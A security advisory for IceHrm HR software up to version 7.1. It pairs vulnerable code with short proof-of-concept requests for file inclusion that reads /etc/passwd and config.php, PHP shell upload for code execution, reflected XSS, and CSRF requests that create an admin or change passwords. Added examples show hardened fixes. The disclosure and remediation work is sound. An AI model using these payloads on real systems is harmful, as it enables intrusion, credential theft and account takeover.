IceHrm <=7.1 Multiple Vulnerabilities

2014-12-08 / 2014-12-09
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

IceHrm <=7.1 Multiple Vulnerabilities

Vendor: IceHRM
Product web page: http://www.icehrm.com
Affected version: <= 7.1

Summary: IceHrm is Human Resource Management web software for small and medium sized organizations. The software is written in PHP. It is available as a community (free), commercial and hosted (cloud) solution.

Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities including Local File Inclusion, Cross-Site Scripting, Malicious File Upload, Cross-Site Request Forgery and Code Execution.

Tested on: Apache/2.2.15 (Unix)
           PHP/5.3.3
           MySQL 5.1.73

Vulnerabilities discovered by Stefan 'sm' Petrushevski
                             @zeroscience

Advisory ID: ZSL-2014-5215
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php

01.12.2014

---

1. Local File Inclusion (LFI)
#####################################################

File: app/index.php

Vulnerable code:
---- snip ----
include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';
---- snip ----

Request: app/?g=../&n=../../../../etc/passwd%00

Proof of Concept (PoC):
http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00

Severity: CRITICAL
#####################################################

2. Local File Inclusion (LFI)
#####################################################

File: service.php

Vulnerable code:
---- snip ----
if($action == 'download'){
    $fileName = $_REQUEST['file'];
    $fileName = CLIENT_BASE_PATH.'data/'.$fileName;
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($fileName));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($fileName));
    ob_clean();
    flush();
    readfile($fileName);
---- snip ----

Proof of Concept (PoC):
http://zsltest/icehrm/app/service.php?a=download&file=../config.php

Severity: CRITICAL
#####################################################

3. Malicious File Upload / Code Execution
#####################################################

File: fileupload.php

Vulnerable code:
---- snip ----
//Generate File Name
$saveFileName = $_POST['file_name'];
if(empty($saveFileName) || $saveFileName == "_NEW_"){
    $saveFileName = microtime();
    $saveFileName = str_replace(".", "-", $saveFileName);
}

$file = new File();
$file->Load("name = ?",array($saveFileName));

// list of valid extensions, ex. array("jpeg", "xml", "bmp")
$allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");
// max file size in bytes
$sizeLimit = MAX_FILE_SIZE_KB * 1024;

$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
$result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);
// to pass data through iframe you will need to encode all html tags
if($result['success'] == 1){
    $file->name = $saveFileName;
    $file->filename = $result['filename'];
    $file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];
    $file->file_group = $_POST['file_group'];
    $file->Save();
    $result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];
    $result['data'] .= "|".$saveFileName;
    $result['data'] .= "|".$file->id;
}
---- snip ----

Proof of Concept (PoC) method:

1. Change the 'file_name' request parameter to the desired filename. The file will be saved in the 'data' folder.
   Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt
2. Create a malicious file (php shell) and save it with a .txt extension.
3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in the 'data' folder as dsadsa.php.txt.
4. Access the file http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code.

PoC example:

1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1
2. xxx.txt contents: <?php phpinfo(); ?>
3. Upload the file
4. Access the file:

Severity: CRITICAL
#####################################################

4. Cross-Site Scripting (XSS)
#####################################################

File: login.php

Vulnerable code:
---- snip ----
<script type="text/javascript">
var key = "";
<?php if(isset($_REQUEST['key'])){?>
key = '<?=$_REQUEST['key']?>';
key = key.replace(/ /g,"+");
<?php }?>
---- snip ----

Proof of Concept (PoC):
http://zsltest/icehrm/app/login.php?key=';</script><script>alert('zsl');</script>

Severity: MEDIUM
#####################################################

5. Cross-Site Scripting (XSS)
#####################################################

File: fileupload_page.php

Vulnerable code:
---- snip ----
<div id="upload_form">
<form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data">
<input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/>
<input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/>
<input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/>
<label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file" type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input>
...
---- snip ----

Vulnerable parameters: id, file_group, user, msg

Proof of Concept (PoC):
http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert('zsl')%3C/script%3E

Severity: MEDIUM
#####################################################

6. Information Disclosure / Leaking Sensitive User Info
#####################################################

Users'/employees' profile images are easily accessible in the 'data' folder.

Proof of Concept (PoC):
http://192.168.200.119/icehrm/app/data/profile_image_1.jpg
http://192.168.200.119/icehrm/app/data/profile_image_X.jpg   <- X = user id

Severity: LOW
#####################################################

7. Cross-Site Request Forgery (CSRF)
#####################################################

All forms are vulnerable to CSRF.

Documents library:
http://localhost/icehrm/app/service.php
POST document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument

Personal info:
http://localhost/icehrm/app/service.php
GET t=Employee a=ca sa=get mod=modules=employees req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"}

Add new admin user:
http://localhost/icehrm/app/service.php
POST username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User

Change password of user:
http://localhost/icehrm/app/service.php?
GET t=User a=ca sa=changePassword mod=admin=users req={"id":5,"pwd":"newpass"}

Add/edit modules:
http://localhost/icehrm/app/service.php
POST t=Module&a=get&sm=%7B%7D&ft=&ob=

Severity: LOW
#####################################################
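A hardened form of the two path-building snippets from sections 1 and 2, added here as an example; it is not code from IceHrm or from the advisory. It assumes the APP_BASE_PATH and CLIENT_BASE_PATH constants the snippets reference; the function names are this example's own.

```php
<?php
// Added example, not IceHrm code: hardened versions of the path-building code in
// sections 1 and 2. APP_BASE_PATH and CLIENT_BASE_PATH are assumed defined by the app.

// Shared containment check: $path must resolve to a real file strictly under $base.
function isContained($base, $path)
{
    $base = realpath($base);
    $path = realpath($path);
    return $base !== false && $path !== false && is_file($path)
        && strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
}

// Section 1 (app/index.php): never pass request input to include() unchecked.
function resolveModuleIndex($group, $name)
{
    // Group and module names are plain identifiers: no '/', '.' or NUL bytes
    // (on the PHP 5.3.3 the advisory tested, "%00" would truncate the path).
    if (!preg_match('/^[A-Za-z0-9_]+$/', $group) || !preg_match('/^[A-Za-z0-9_]+$/', $name)) {
        return null;
    }
    $candidate = APP_BASE_PATH . '/' . $group . '/' . $name . '/index.php';
    return isContained(APP_BASE_PATH, $candidate) ? realpath($candidate) : null;
}

// Section 2 (service.php, a=download): serve only files that live in data/.
// basename() drops any directory part, so "../config.php" becomes "config.php"
// and is looked up inside data/ only.
function resolveDownload($requested)
{
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    $dataDir = CLIENT_BASE_PATH . 'data';
    $candidate = $dataDir . DIRECTORY_SEPARATOR . basename($requested);
    return isContained($dataDir, $candidate) ? realpath($candidate) : null;
}

// Replacement for the download branch: 404 unless the resolver accepts the name
// (the remaining response headers stay as in the original snippet).
function serveDownload($requested)
{
    $fileName = resolveDownload($requested);
    if ($fileName === null) {
        header('HTTP/1.0 404 Not Found');
        return false;
    }
    header('Content-Disposition: attachment; filename=' . basename($fileName));
    readfile($fileName);
    return true;
}
```

The include in app/index.php then becomes a null check on resolveModuleIndex() followed by include of the returned path, and the download branch calls serveDownload($_REQUEST['file']) instead of concatenating the raw parameter.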
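Context-aware output encoding for the reflection points in sections 4 and 5, added here as an example and not code from IceHrm; the function names and the sample request values are this example's own.

```php
<?php
// Added example, not IceHrm code: context-aware output encoding for the
// reflection points in sections 4 and 5. Function names are this example's own.

// Section 4 (login.php): the value is written inside a JavaScript string
// literal in a <script> block. htmlspecialchars() is the wrong tool there:
// entities are not decoded inside <script> and a backslash could still alter
// the literal. Emit a JSON string literal instead, with the HEX flags so
// <, >, ', " and & can neither end the literal nor the <script> element.
function jsStringLiteral($value)
{
    $json = json_encode((string) $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
    return $json === false ? '""' : $json;   // invalid UTF-8: fall back to empty
}

// Section 5 (fileupload_page.php): id, file_group, user and msg are written
// into double-quoted attribute values and element text; encode both quote
// styles so a stray " cannot close the attribute and start a new one.
function htmlText($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Corrected templates, with constructed request values standing in for
// $_REQUEST['key'] and $_REQUEST['id'].
function renderLoginScript($key)
{
    return "<script type=\"text/javascript\">\n"
        . "var key = " . jsStringLiteral($key) . ";\n"
        . "key = key.replace(/ /g,\"+\");\n"
        . "</script>\n";
}

function renderFileNameInput($id)
{
    return '<input id="file_name" name="file_name" type="hidden" value="'
        . htmlText($id) . '"/>' . "\n";
}

echo renderLoginScript("';</script><b>x</b>");
echo renderFileNameInput('XXXX"><b>x</b>');
```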

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php